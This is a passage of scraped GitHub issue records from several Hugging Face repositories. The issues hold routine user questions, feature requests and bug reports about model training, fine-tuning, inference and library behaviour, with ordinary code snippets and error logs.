I'd like to reproduce full-parameter fine-tuning with DPO training. However, I only have 10 Nvidia A40 GPUs (46 GB memory each).\r\n\r\nI tried the command\r\n\r\n`CUDA_VISIBLE_DEVICES=2,3,4,5,6,7,8,9 ACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/deepspeed_zero3.yaml --main_process_port 6000 scripts/run_dpo.py recipes/zephyr-7b-beta/dpo/config_full.yaml`\r\n\r\nand it reported an OOM error, even if I set the batch size to 1.\r\n\r\nI don't mind if the program runs a bit slower (e.g., using a smaller batch size and more gradient accumulation steps). However, I don't know if there is a way to successfully deploy the full-dpo code. \r\n\r\nCan you help me, please?\r\n\r\n\r\nAlso, I'm wondering how large the performance gap is between LoRA and full-parameter fine-tuning.", "url": "https://github.com/huggingface/alignment-handbook/issues/22", "state": "open", "labels": [], "created_at": "2023-11-14T01:33:41Z", "updated_at": "2024-02-14T13:47:16Z", "user": "ChenDRAG" }, { "repo": "huggingface/controlnet_aux", "number": 83, "title": "How to get keypoints output .json file like original OpenPose?", "body": "", "url": "https://github.com/huggingface/controlnet_aux/issues/83", "state": "open", "labels": [], "created_at": "2023-11-13T21:55:35Z", "updated_at": "2023-11-17T21:04:49Z", "user": "mayank64ce" }, { "repo": "huggingface/chat-ui", "number": 550, "title": "Can this ui be run on a colab?", "body": "I am wondering if this ui can be used inside a colab.", "url": "https://github.com/huggingface/chat-ui/issues/550", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-13T16:58:35Z", "updated_at": "2023-11-15T16:17:10Z", "user": "amida47" }, { "repo": "huggingface/text-generation-inference", "number": 1258, "title": "How to deal with a bias=True model", "body": "### Feature request\n\nHow to deploy a model with bias=True. Example: vinai/PhoGPT-7B5-Instruct\n\n### Motivation\n\n.\n\n### Your contribution\n\n.", "url": "https://github.com/huggingface/text-generation-inference/issues/1258", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-13T09:20:08Z", "updated_at": "2024-01-20T01:46:38Z", "user": "anhnh2002" }, { "repo": "huggingface/trl", "number": 985, "title": "how to set the epoch number in SFTTrainer?", "body": "Here is my example code:\r\nfrom datasets import load_dataset\r\nfrom trl import SFTTrainer\r\n\r\ndataset = load_dataset(\"imdb\", split=\"train\")\r\n\r\ntrainer = SFTTrainer(\r\n \"sshleifer/tiny-gpt2\",\r\n train_dataset=dataset,\r\n dataset_text_field=\"text\",\r\n max_seq_length=512,\r\n)\r\ntrainer.train()", "url": "https://github.com/huggingface/trl/issues/985", "state": "closed", "labels": [], "created_at": "2023-11-12T20:02:31Z", "updated_at": "2023-11-14T18:29:53Z", "user": "KlausikPL" }, { "repo": "huggingface/diffusers", "number": 5774, "title": "How to fine tune Stable Diffusion on custom dataset {caption, image}?", "body": "I need to fine-tune SD on a custom dataset {caption, image} with a custom size. 
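As a point of reference, such a {caption, image} dataset is usually laid out so the `datasets` imagefolder loader can pick up the captions. A minimal sketch follows; the `text` column name and the toy file names are assumptions (matching the default caption column of the diffusers text-to-image example script), and the image files are presumed to already exist in the folder:

```python
# Sketch: write a metadata.jsonl next to the images so that
# load_dataset("imagefolder", ...) yields {"image", "text"} pairs.
import json
import pathlib

root = pathlib.Path("my_dataset/train")
root.mkdir(parents=True, exist_ok=True)
captions = {"0001.png": "a red chair", "0002.png": "a blue lamp"}  # toy data

with open(root / "metadata.jsonl", "w") as f:
    for file_name, caption in captions.items():
        f.write(json.dumps({"file_name": file_name, "text": caption}) + "\n")

from datasets import load_dataset

ds = load_dataset("imagefolder", data_dir=str(root), split="train")
```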
Could you please give me a tutorial for this task?", "url": "https://github.com/huggingface/diffusers/issues/5774", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-12T14:52:23Z", "updated_at": "2024-01-09T15:07:21Z", "user": "npk7264" }, { "repo": "huggingface/diffusers", "number": 5772, "title": "Is webdataset faster than the default huggingface datasets?", "body": "### Describe the bug\n\nHi, I see there is a large-scale training example https://github.com/huggingface/diffusers/blob/controlnet_webdatasets/examples/controlnet/train_controlnet_webdatasets.py using webdatasets, which suggests that webdatasets may have better data loading performance than huggingface datasets, which are organized with Apache Arrow.\r\n\r\nSo I'm wondering whether or not webdatasets is a good choice for me. I have an image dataset with 350k images, each image is 768 * 768, and I use a batch size of 64 or 192. Is webdataset for me? Any help would be appreciated!\n\n### Reproduction\n\n.\n\n### Logs\n\n_No response_\n\n### System Info\n\n.\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/5772", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-12T08:40:22Z", "updated_at": "2024-01-09T15:07:23Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/chat-ui", "number": 549, "title": "How can I use this offline with local models?", "body": "I really like the web_search feature; can I somehow use it with local models? I tried, but I don't see any .bat files to launch it.", "url": "https://github.com/huggingface/chat-ui/issues/549", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-11T23:59:09Z", "updated_at": "2023-11-20T21:38:27Z", "comments": 9, "user": "iChristGit" }, { "repo": "huggingface/diffusers", "number": 5766, "title": "Image+Image+Text to Image", "body": "Maybe a dumb question, but I can't seem to find good ways to do multiple-image-to-image modeling. I looked into Multi-ControlNet but I can't tell how to use it. I'm trying to train a model that takes in 2 images and a prompt: \r\n1. a template base image (e.g. a photo of a room in someone's house with a painting on the wall)\r\n2. a photo of a painting someone made (e.g. not a famous one like a Van Gogh, just someone's painting)\r\n3. an optional text prompt describing the 2nd image...may not be necessary but curious what people here say\r\n\r\nAnd I want to place image2 in image1 to replace the painting on the wall with the new one. Is this the right forum / model to use? I thought maybe creating a custom dataset and then simply feeding 2 image controls in would do the job, but I could really use some experts' guidance here. ", "url": "https://github.com/huggingface/diffusers/issues/5766", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-11T20:15:27Z", "updated_at": "2024-01-09T15:07:25Z", "user": "tval2" }, { "repo": "huggingface/optimum", "number": 1531, "title": "Pytorch + TensorRT support", "body": "### Feature request\n\nIs it possible to start supporting Pytorch and TensorRT inference optimizations? 
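(One hedged data point: TensorRT can already be reached indirectly through ONNX Runtime's `TensorrtExecutionProvider`, which optimum's ORT model classes accept via the `provider` argument. This is the ONNX path rather than the native PyTorch/TensorRT integration requested here, and it assumes an `onnxruntime-gpu` build with TensorRT enabled:

```python
# Sketch: export a model to ONNX and run it on the TensorRT execution provider.
from optimum.onnxruntime import ORTModelForSequenceClassification
from transformers import AutoTokenizer

model_id = "distilbert-base-uncased-finetuned-sst-2-english"
model = ORTModelForSequenceClassification.from_pretrained(
    model_id, export=True, provider="TensorrtExecutionProvider"
)
tokenizer = AutoTokenizer.from_pretrained(model_id)
inputs = tokenizer("TensorRT via ONNX Runtime", return_tensors="pt")
print(model(**inputs).logits)
```
)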
There are a lot of use cases where it could be useful, and optimum seems to already have a lot of good tooling to enable this.\n\n### Motivation\n\nUsing Pytorch or TensorRT in production is painful today and requires a lot of custom optimizations.\n\n### Your contribution\n\nI could help with a PR.", "url": "https://github.com/huggingface/optimum/issues/1531", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2023-11-11T17:27:47Z", "updated_at": "2025-02-27T02:04:37Z", "comments": 2, "user": "youssefadr" }, { "repo": "huggingface/optimum", "number": 1530, "title": "AnimateDiff support?", "body": "### Feature request\n\nHi!\r\nCould you please support AnimateDiff for ONNX in the future? It would be great for both GPU DirectML and CPU users.\r\n\r\nKind regards\n\n### Motivation\n\nNot a bug, just a feature that I would really like to see for DirectML and CPU users of ONNX.\n\n### Your contribution\n\nI would, but I don't know anything about coding. I'm just a casual user.", "url": "https://github.com/huggingface/optimum/issues/1530", "state": "closed", "labels": [ "feature-request", "Stale" ], "created_at": "2023-11-11T14:21:25Z", "updated_at": "2025-03-01T02:08:38Z", "comments": 1, "user": "Amin456789" }, { "repo": "huggingface/autotrain-advanced", "number": 338, "title": "How to ", "body": "I successfully trained the Mistral 7B sharded model on Google Colab using autotrain.\r\n\r\nNow, how can I do inference? I am unable to merge the adapter with the base model. Can someone please share the code for inference with me? Please help.", "url": "https://github.com/huggingface/autotrain-advanced/issues/338", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-11T12:58:24Z", "updated_at": "2024-05-06T13:35:52Z", "user": "eviIgenius" }, { "repo": "huggingface/diffusers", "number": 5761, "title": "The cost of consistency decoder", "body": "### Describe the bug\n\nI replaced the original VAE decoder of a stable diffusion model with the Consistency Decoder, and then CUDA out of memory occurs. My question is how large the Consistency Decoder is compared to the original VAE decoder.\r\n\r\n- `diffusers` version: 0.23.0\r\n- Platform: Linux-5.15.0-60-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.11\r\n- PyTorch version (GPU?): 2.0.0+cu118 (True)\r\n- Huggingface_hub version: 0.17.3\r\n- Transformers version: 4.34.0\r\n- Accelerate version: 0.23.0\r\n- xFormers version: 0.0.18\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Reproduction\n\nDecode a large latent\n\n### Logs\n\n_No response_\n\n### System Info\n\n..\n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/5761", "state": "closed", "labels": [ "question", "stale" ], "created_at": "2023-11-11T03:54:20Z", "updated_at": "2024-01-09T15:07:30Z", "user": "Luciennnnnnn" }, { "repo": "huggingface/candle", "number": 1319, "title": "Question: How to edit specific indices of a tensor?", "body": "Hello everybody,\r\n\r\nWhile developing beam search for candle-sampling, I have run into a small issue where it appears there is no way to edit specific indices of a tensor after creation. 
For example, in Python the following works for lists (and very similar for pytorch tensors):\r\n\r\n```python\r\nvalues = [[1,2,3],[4,5,6]]\r\nvalues[0][0] = 0\r\nprint(values) #[[0,2,3],[4,5,6]]\r\n```\r\n\r\nIs there an equivalent in `Candle` which I can use to edit specific indices of a tensor without creating a new tensor?", "url": "https://github.com/huggingface/candle/issues/1319", "state": "closed", "labels": [], "created_at": "2023-11-11T01:10:42Z", "updated_at": "2023-11-26T15:53:19Z", "user": "EricLBuehler" }, { "repo": "huggingface/datasets", "number": 6400, "title": "Safely load datasets by disabling execution of dataset loading script", "body": "### Feature request\n\nIs there a way to disable execution of dataset loading script using `load_dataset`? This is a security vulnerability that could lead to arbitrary code execution. \r\n\r\nAny suggested workarounds are welcome as well. \n\n### Motivation\n\nThis is a security vulnerability that could lead to arbitrary code execution. \n\n### Your contribution\n\nn/a", "url": "https://github.com/huggingface/datasets/issues/6400", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-11-10T23:48:29Z", "updated_at": "2024-06-13T15:56:13Z", "comments": 4, "user": "irenedea" }, { "repo": "huggingface/diffusers", "number": 5758, "title": "how to run huggingface model in replicate", "body": "### Describe the bug\r\n\r\ni am trying to run https://medium.com/ai-artistry/streamlining-ai-agent-development-with-autogen-and-llava-b84fb0d25262 code by adding https://huggingface.co/LLaVA-VL/llava_plus_v0_7b instead of replicate code.\r\n\r\nMy Question is: Challenges running the huggingface model using replicate?\r\n\r\nsomething like this \ud83d\udc4d \r\n```\r\nresponse = replicate.run(\r\n \"yorickvp/llava-13b:2facb4a474a0462c15041b78b1ad70952ea46b5ec6ad29583c0b29dbd4249591\",\r\n input={\"image\": img, \"prompt\": prompt.replace(\"\", \" \")}\r\n )\r\n```\r\ni tried \r\n```\r\nfrom transformers import HfAgent\r\nagent = HfAgent(\"https://api-inference.huggingface.co/models/LLaVA-VL/llava_plus_v0_7b\", additional_tools={\"prompt\": \"Show me a tree\"})\r\n\r\nagent.run(return_code=True)\r\n```\r\n```\r\n---------------------------------------------------------------------------\r\nTypeError Traceback (most recent call last)\r\nCell In[15], line 4\r\n 1 from transformers import HfAgent\r\n 2 agent = HfAgent(\"https://api-inference.huggingface.co/models/LLaVA-VL/llava_plus_v0_7b\", additional_tools={\"prompt\": \"Show me a tree\"})\r\n----> 4 agent.run( return_code=True)\r\n\r\nTypeError: Agent.run() missing 1 required positional argument: 'task'\r\n```\r\n\r\n### Reproduction\r\n\r\nChallenges running the huggingface model using replicate\r\n\r\nsomething like this \ud83d\udc4d \r\n```\r\nresponse = replicate.run(\r\n \"yorickvp/llava-13b:2facb4a474a0462c15041b78b1ad70952ea46b5ec6ad29583c0b29dbd4249591\",\r\n input={\"image\": img, \"prompt\": prompt.replace(\"\", \" \")}\r\n )\r\n```\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nRTX 3090\r\n\r\n### Who can help?\r\n\r\n@patrickvonplaten @sayakpaul @williamberman ", "url": "https://github.com/huggingface/diffusers/issues/5758", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-10T20:31:04Z", "updated_at": "2023-11-11T03:33:51Z", "user": "andysingal" }, { "repo": "huggingface/diffusers", "number": 5756, "title": "How to we generate LCM LoRA of an existing model?", "body": "I generated a DreamBooth model from SDXL base 1.0\r\n\r\nTo get the speed 
boost of LCM I need to generate a LCM LoRA from this model\r\n\r\nHow we do it? I don't see documentation ", "url": "https://github.com/huggingface/diffusers/issues/5756", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-10T15:44:52Z", "updated_at": "2023-12-27T13:28:38Z", "user": "FurkanGozukara" }, { "repo": "huggingface/chat-ui", "number": 548, "title": "MaxListenersExceededWarning: Possible EventEmitter memory leak detected.", "body": "Running dev, and no errors until i try to write into the chat interface on the website locally hosted in WSL2 (win11).\r\n\r\nWorked before i updated to version v.0.6.0\r\n\r\nerror message in web ui:\r\n![image](https://github.com/huggingface/chat-ui/assets/1792727/adc2f421-6cb7-400d-b559-1240b13ff349)\r\n\r\n\r\nError message in terminal:\r\n\r\n> root@xxxxxxxxx:/mnt/c/WSL/HuggingChat test/AI# npm run dev-chat-ui\r\n> \r\n> > ai@1.0.0 dev-chat-ui\r\n> > cd ../chat-ui && npm run dev -- --host 0.0.0.0\r\n> \r\n> \r\n> > chat-ui@0.6.0 dev\r\n> > vite dev --host 0.0.0.0\r\n> \r\n> \r\n> \r\n> VITE v4.3.9 ready in 15775 ms\r\n> \r\n> \u279c Local: http://localhost:5173/\r\n> \u279c Network: http://172.xx.142.227:5173/\r\n> \u279c press h to show help\r\n> (node:80446) **MaxListenersExceededWarning: Possible EventEmitter memory leak detected. 11 close listeners added to [TLSSocket]. Use emitter.setMaxListeners() to increase limit**\r\n> (Use `node --trace-warnings ...` to show where the warning was created)\r\n> 2:44:12 PM [vite] Error when evaluating SSR module /src/lib/server/websearch/sentenceSimilarity.ts:\r\n> |- TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Promise.all (index 0)\r\n> at async loadTokenizer (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n> at async AutoTokenizer.from_pretrained (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n> \r\n> 2:44:12 PM [vite] Error when evaluating SSR module /src/lib/server/websearch/runWebSearch.ts: failed to import \"/src/lib/server/websearch/sentenceSimilarity.ts\"\r\n> |- TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Promise.all (index 0)\r\n> at async loadTokenizer (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n> at async AutoTokenizer.from_pretrained 
(file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n> \r\n> 2:44:12 PM [vite] Error when evaluating SSR module /mnt/c/WSL/HuggingChat test/chat-ui/src/routes/conversation/[id]/+server.ts: failed to import \"/src/lib/server/websearch/runWebSearch.ts\"\r\n> |- TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Promise.all (index 0)\r\n> at async loadTokenizer (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n> at async AutoTokenizer.from_pretrained (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n> \r\n> TypeError: fetch failed\r\n> at fetch (/mnt/c/WSL/HuggingChat test/chat-ui/node_modules/undici/index.js:110:15)\r\n> at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n> at runNextTicks (node:internal/process/task_queues:64:3)\r\n> at listOnTimeout (node:internal/timers:540:9)\r\n> at process.processTimers (node:internal/timers:514:7)\r\n> at async getModelFile (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n> at async getModelJSON (file:///mnt/c/WSL/HuggingChat%20test/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n> at async Pr", "url": "https://github.com/huggingface/chat-ui/issues/548", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-10T13:56:03Z", "updated_at": "2023-11-16T20:02:07Z", "comments": 7, "user": "patchie" }, { "repo": "huggingface/sentence-transformers", "number": 2355, "title": "How to Finetune a CLIP Model with Custom Data", "body": "I want to train on my custom data to get high-accuracy embeddings of my image data.\r\n\r\nAre there any scripts or documentation that would be helpful?\r\n\r\nThank you.", "url": "https://github.com/huggingface/sentence-transformers/issues/2355", "state": "closed", "labels": [], "created_at": "2023-11-10T07:27:23Z", "updated_at": "2023-12-25T03:23:20Z", "user": "unmo" }, { "repo": "huggingface/diffusers", "number": 5742, "title": "where is the Parameter Description?", "body": "", "url": "https://github.com/huggingface/diffusers/issues/5742", "state": "closed", "labels": [], "created_at": "2023-11-10T07:07:03Z", "updated_at": "2023-11-13T18:01:56Z", "user": "MRG-DOT" }, { "repo": "huggingface/setfit", "number": 436, "title": "[Question] Could you tell me the latest embedding model usable by setfit?", "body": "Hi!\r\nThis is not a bug report but a question.\r\nFrom my understanding, when we use SetFit, we have to choose one of the embedding models from sentence-transformers.\r\nBut now, I feel those models are kind of old, and I would like to know the latest embedding model which can be used by setfit.\r\n\r\nThank you in advance", "url": "https://github.com/huggingface/setfit/issues/436", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-10T02:10:01Z", 
"updated_at": "2023-11-12T01:02:24Z", "user": "Yongtae723" }, { "repo": "huggingface/datasets", "number": 6394, "title": "TorchFormatter images (H, W, C) instead of (C, H, W) format", "body": "### Describe the bug\r\n\r\nUsing .set_format(\"torch\") leads to images having shape (H, W, C), the same as in numpy. \r\nHowever, pytorch normally uses (C, H, W) format.\r\n\r\nMaybe I'm missing something but this makes the format a lot less useful as I then have to permute it anyways.\r\nIf not using the format it is possible to directly use torchvision transforms but any non-transformed value will not be a tensor.\r\n\r\nIs there a reason for this choice?\r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nfrom datasets import Dataset, Features, Audio, Image\r\nimages = [\"path/to/image.png\"] * 10\r\nfeatures = Features({\"image\": Image()})\r\nds = Dataset.from_dict({\"image\": images}, features=features) \r\nds = ds.with_format(\"torch\")\r\nds[0][\"image\"].shape\r\n```\r\n```python\r\ntorch.Size([512, 512, 4])\r\n```\r\n\r\n### Expected behavior\r\n\r\n```python\r\nfrom datasets import Dataset, Features, Audio, Image\r\nimages = [\"path/to/image.png\"] * 10\r\nfeatures = Features({\"image\": Image()})\r\nds = Dataset.from_dict({\"image\": images}, features=features) \r\nds = ds.with_format(\"torch\")\r\nds[0][\"image\"].shape\r\n```\r\n```python\r\ntorch.Size([4, 512, 512])\r\n```\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 2.14.6\r\n- Platform: Linux-6.5.9-100.fc37.x86_64-x86_64-with-glibc2.31\r\n- Python version: 3.11.6\r\n- Huggingface_hub version: 0.18.0\r\n- PyArrow version: 14.0.1\r\n- Pandas version: 2.1.2", "url": "https://github.com/huggingface/datasets/issues/6394", "state": "closed", "labels": [], "created_at": "2023-11-09T16:02:15Z", "updated_at": "2024-04-11T12:40:16Z", "comments": 9, "user": "Modexus" }, { "repo": "huggingface/transformers.js", "number": 386, "title": "[Question] Any plan to rewrite js in typescript ?", "body": "I'm doing it for my own usage although I'm loosing the benfit of upgrades.\r\n\r\nTypings are usefull you know :)\r\n\r\nWhile doing it I found this,\r\nin models.js, line 1027 :\r\n```javascript\r\nlet sampledTokens = sampler(logits);\r\n```\r\nshould be \r\n```javascript\r\nlet sampledTokens = sampler.sample(logits);\r\n```", "url": "https://github.com/huggingface/transformers.js/issues/386", "state": "closed", "labels": [ "question" ], "created_at": "2023-11-09T13:41:10Z", "updated_at": "2023-11-15T18:18:39Z", "user": "pnocera" }, { "repo": "huggingface/candle", "number": 1304, "title": "How to repeat_interleave on Tensor?", "body": "There is [repeat_interleave](https://pytorch.org/docs/stable/generated/torch.repeat_interleave.html) function, but I can't find analog in candle.\r\n\r\nI need convert `tensor([[6110, 1]])` to `tensor([[6110, 1], [6110, 1], [6110, 1]])`\r\n\r\nI found some examples [like](https://github.com/huggingface/candle/blob/f772213e844fdfcc8dbaf662fc11819f4028dc78/candle-transformers/src/models/segment_anything/mask_decoder.rs#L234) this and [this](https://github.com/huggingface/candle/blob/73d02f4f57c788c43f3e11991635bc15701c25c0/candle-transformers/src/models/mpt.rs#L137). 
But in my case the result is `tensor([6110, 6110, 6110, 1, 1, 1])`.\r\n\r\nIt looks like I'm doing something wrong :-D I expect the same result as from python https://github.com/huggingface/transformers/blob/main/src/transformers/generation/utils.py#L3090C31-L3090C31\r\n\r\nHow can I reproduce the python example in the current candle version?", "url": "https://github.com/huggingface/candle/issues/1304", "state": "closed", "labels": [], "created_at": "2023-11-09T06:31:04Z", "updated_at": "2023-11-09T08:16:19Z", "user": "bragovo" }, { "repo": "huggingface/diffusers", "number": 5709, "title": "How to run a stable diffusion pipeline using multithreading in FastAPI?", "body": "Hi, I have created a stable diffusion API using FastAPI and it works perfectly fine if sequential requests are made. I have tried to implement multithreading in the API to run multiple requests concurrently, but the problem is that every request's output generation time depends on the total number of requests made. For example, if one request takes 5 secs to run and 5 requests are made simultaneously, then it will take 5*5 = 25 secs for every request to get its output. After researching this problem, I got to know that the GIL (Global Interpreter Lock) in python allows only one thread to execute per process, so we get the same throughput as a single thread if we use multithreading for this purpose. Also, I have tried multiprocessing to overcome this issue, but it loads a separate instance of the same model for each process, and it becomes very hard to load all the models in 16 GB RAM.\r\n\r\nDo you know how to get output in the same time for every request that is made? If 5 requests are made concurrently, then every request should get its output in 5 seconds. Also, does the GPU configuration matter for getting results quickly based on the number of requests?\r\n\r\nGPU Configuration:\r\nNvidia 3050 8GB RAM\r\n\r\n@sayakpaul @patrickvonplaten ", "url": "https://github.com/huggingface/diffusers/issues/5709", "state": "closed", "labels": [ "stale" ], "created_at": "2023-11-08T16:19:45Z", "updated_at": "2024-01-09T15:07:46Z", "user": "minkvirparia" }, { "repo": "huggingface/gsplat.js", "number": 23, "title": "How do you set up initial camera position?", "body": "When loading a splat file, I'd like to set the initial camera position to a specific location. 
How can this be achieved?", "url": "https://github.com/huggingface/gsplat.js/issues/23", "state": "closed", "labels": [ "enhancement", "question" ], "created_at": "2023-11-08T16:04:04Z", "updated_at": "2023-11-11T16:35:57Z", "user": "reconlabs-chris" }, { "repo": "huggingface/safetensors", "number": 381, "title": "Would a CLI to perform the convert operation be useful?", "body": "### Feature request\n\nWould it be possible to add to this repo a CLI tool that uses the library to convert files stored in different formats to safetensors?\r\nIt would also be useful to have a way, from the command line, to introspect a model and find some properties about it (layers, metadata, ...).\n\n### Motivation\n\nI'm frustrated when I have a lot of example models on my disk that I'm not too sure about. I would like a quick and easy way to inspect them, convert them, compress them, and do all the tasks I need straight from the command line, with completion support.\n\n### Your contribution\n\nI could contribute design suggestions about the interface, but I have no particular knowledge of Rust and I'm learning transformers and ML in general.", "url": "https://github.com/huggingface/safetensors/issues/381", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-11-08T15:39:02Z", "updated_at": "2024-01-02T01:48:28Z", "comments": 2, "user": "remyleone" }, { "repo": "huggingface/transformers", "number": 27361, "title": "Add how to preprocess mask for finetuning with SAM", "body": "### Feature request\n\nThe [SAM image processor](https://github.com/huggingface/transformers/blob/main/src/transformers/models/sam/image_processing_sam.py) takes images as input and resizes them so that the longest edge is 1024 (using default values). This is the size expected as input for the SAM model. \r\nFor inference this works fine, as only the images need resizing, but for fine-tuning as per [this tutorial](https://github.com/NielsRogge/Transformers-Tutorials/blob/master/SAM/Fine_tune_SAM_(segment_anything)_on_a_custom_dataset.ipynb) you need to resize both your images and your masks, as the SAM model produces `pred_masks` with size 256x256. 
If I don't resize my masks I get `ground truth has different shape (torch.Size([2, 1, 768, 1024])) from input (torch.Size([2, 1, 256, 256]))` when trying to calculate loss.\r\n\r\nTo fix this, I've currently written a resize and pad function into my code:\r\n\r\n```\r\nfrom PIL import Image\r\n\r\ndef resize_mask(image):\r\n longest_edge = 256\r\n \r\n # get new size\r\n w, h = image.size\r\n scale = longest_edge * 1.0 / max(h, w)\r\n new_h, new_w = h * scale, w * scale\r\n new_h = int(new_h + 0.5)\r\n new_w = int(new_w + 0.5)\r\n\r\n resized_image = image.resize((new_w, new_h), resample=Image.Resampling.BILINEAR)\r\n return resized_image\r\n\r\ndef pad_mask(image):\r\n pad_height = 256 - image.height\r\n pad_width = 256 - image.width\r\n\r\n padding = ((0, pad_height), (0, pad_width))\r\n padded_image = np.pad(image, padding, mode=\"constant\")\r\n return padded_image\r\n\r\ndef process_mask(image):\r\n resized_mask = resize_mask(image)\r\n padded_mask = pad_mask(resized_mask)\r\n return padded_mask\r\n```\r\n\r\nand then have added this to my definition of SAMDataset:\r\n\r\n```\r\nclass SAMDataset(Dataset):\r\n def __init__(self, dataset, processor, transform = None):\r\n self.dataset = dataset\r\n self.processor = processor\r\n self.transform = transform\r\n\r\n def __len__(self):\r\n return len(self.dataset)\r\n\r\n def __getitem__(self, idx):\r\n item = self.dataset[idx]\r\n \r\n if self.transform:\r\n image = self.transform(item[\"pixel_values\"])\r\n else:\r\n image = item[\"pixel_values\"]\r\n \r\n # get bounding box prompt\r\n padded_mask = process_mask(item[\"label\"])\r\n prompt = get_bounding_box(padded_mask)\r\n\r\n # prepare image and prompt for the model\r\n inputs = self.processor(image, input_boxes=[[prompt]], return_tensors=\"pt\")\r\n\r\n # remove batch dimension which the processor adds by default\r\n inputs = {k:v.squeeze(0) for k,v in inputs.items()}\r\n\r\n # add ground truth segmentation\r\n inputs[\"ground_truth_mask\"] = padded_mask\r\n\r\n return inputs\r\n```\r\n\r\nThis seems to work fine. \r\n\r\nWhat I think would be good is to allow input of masks in the SAM image processor. For example, the [Segformer image processor](https://github.com/huggingface/transformers/blob/v4.35.0/src/transformers/models/segformer/image_processing_segformer.py#L305) takes images and masks as inputs and resizes both to the size expected by the Segformer model. \r\n\r\nI have also seen there is a 'post_process_mask' method in the SAM image processor but I am unsure how to implement this in the tutorial I'm following. If you think this is a better way vs. what I am suggesting then please could you explain where I would add this in the code from the tutorial notebook.\n\n### Motivation\n\nEasier fine tuning of SAM model.\n\n### Your contribution\n\nI could try write a PR for this and/or make a PR to update the [notebook](https://github.com/NielsRogge/Transformers-Tutorials/blob/master/SAM/Fine_tune_SAM_(segment_anything)_on_a_custom_dataset.ipynb) instead .", "url": "https://github.com/huggingface/transformers/issues/27361", "state": "closed", "labels": [ "Feature request", "Vision" ], "created_at": "2023-11-08T11:53:31Z", "updated_at": "2024-01-08T16:40:38Z", "user": "rwood-97" }, { "repo": "huggingface/chat-ui", "number": 546, "title": "Custom Theme", "body": "I want to change the UI layout yet still be able to update the code in order to enjoy the new features as they are released.\r\nIs there a way to add my changes in a way that would be similar to a theme? 
